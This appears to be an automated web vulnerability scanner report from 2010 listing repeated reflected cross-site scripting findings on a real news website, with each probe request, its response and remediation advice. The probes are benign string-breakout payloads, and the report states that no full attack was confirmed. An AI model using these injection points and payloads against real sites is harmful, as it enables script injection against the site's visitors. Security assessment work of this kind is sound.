GET /includes/sidebar/most-popular/ba0cd'%3bffc5ac2518 HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:57:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:57:30 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 43557
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc773'%3b3d124b5b04 was submitted in the REST URL parameter 1. This input was echoed as bc773';3d124b5b04 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsbc773'%3b3d124b5b04/account_s_code.js HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:17 GMT Date: Sun, 19 Dec 2010 03:03:17 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 42992
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f01f'%3b33001376b97 was submitted in the REST URL parameter 2. This input was echoed as 6f01f';33001376b97 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/6f01f'%3b33001376b97 HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:03:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:03:23 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 42957
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afcb6'%3b20b8654109d was submitted in the REST URL parameter 1. This input was echoed as afcb6';20b8654109d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsafcb6'%3b20b8654109d/local_s_code.js HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:20 GMT Date: Sun, 19 Dec 2010 03:03:20 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 42994
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3904a'%3b66e2a69e5b6 was submitted in the REST URL parameter 2. This input was echoed as 3904a';66e2a69e5b6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/3904a'%3b66e2a69e5b6 HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:03:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:03:26 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 42957
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee474'%3b656ca213590 was submitted in the REST URL parameter 1. This input was echoed as ee474';656ca213590 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /magazineee474'%3b656ca213590/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:08:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43140
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799c0'%3b846cbcb660c was submitted in the REST URL parameter 1. This input was echoed as 799c0';846cbcb660c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets799c0'%3b846cbcb660c/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:08:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36302
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89cb2'%3ba2a4a97ee03 was submitted in the REST URL parameter 1. This input was echoed as 89cb2';a2a4a97ee03 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets89cb2'%3ba2a4a97ee03/company/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43332
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd9f6'%3b784d6ba2a9b was submitted in the REST URL parameter 2. This input was echoed as dd9f6';784d6ba2a9b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/companydd9f6'%3b784d6ba2a9b/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43296
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76a86'%3b18777c60d8e was submitted in the REST URL parameter 3. This input was echoed as 76a86';18777c60d8e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/company/76a86'%3b18777c60d8e HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43339
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72b02'%3ba82f1c7067e was submitted in the REST URL parameter 1. This input was echoed as 72b02';a82f1c7067e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets72b02'%3ba82f1c7067e/company/news/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68964 Expires: Sun, 19 Dec 2010 02:58:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets72b02';a82f1c7067e/company/news/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets72b02';a82f1c7067e;kw=company;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=19334656?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53308'%3bd98cf4b6041 was submitted in the REST URL parameter 2. This input was echoed as 53308';d98cf4b6041 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/company53308'%3bd98cf4b6041/news/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70239 Expires: Sun, 19 Dec 2010 02:58:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company53308';d98cf4b6041/news/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company53308';d98cf4b6041;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68119831?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f73'%3bc39a440a891 was submitted in the REST URL parameter 3. This input was echoed as f6f73';c39a440a891 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/company/newsf6f73'%3bc39a440a891/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69677 Expires: Sun, 19 Dec 2010 02:58:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company/newsf6f73';c39a440a891/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company;kw=newsf6f73';c39a440a891;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97628114?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ed45'%3be3d4058c973 was submitted in the REST URL parameter 4. This input was echoed as 8ed45';e3d4058c973 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/company/news/8ed45'%3be3d4058c973 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:59:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:59:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43481
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4081d'%3b37f4d0cacb4 was submitted in the REST URL parameter 1. This input was echoed as 4081d';37f4d0cacb4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets4081d'%3b37f4d0cacb4/currencies/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43392
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c598b'%3bb34dc10ee96 was submitted in the REST URL parameter 2. This input was echoed as c598b';b34dc10ee96 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/currenciesc598b'%3bb34dc10ee96/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:09:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:09:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43356
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52095'%3bb85c90f4c12 was submitted in the REST URL parameter 1. This input was echoed as 52095';b85c90f4c12 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets52095'%3bb85c90f4c12/data/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:08:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43272
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90bb7'%3b3637543487d was submitted in the REST URL parameter 2. This input was echoed as 90bb7';3637543487d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
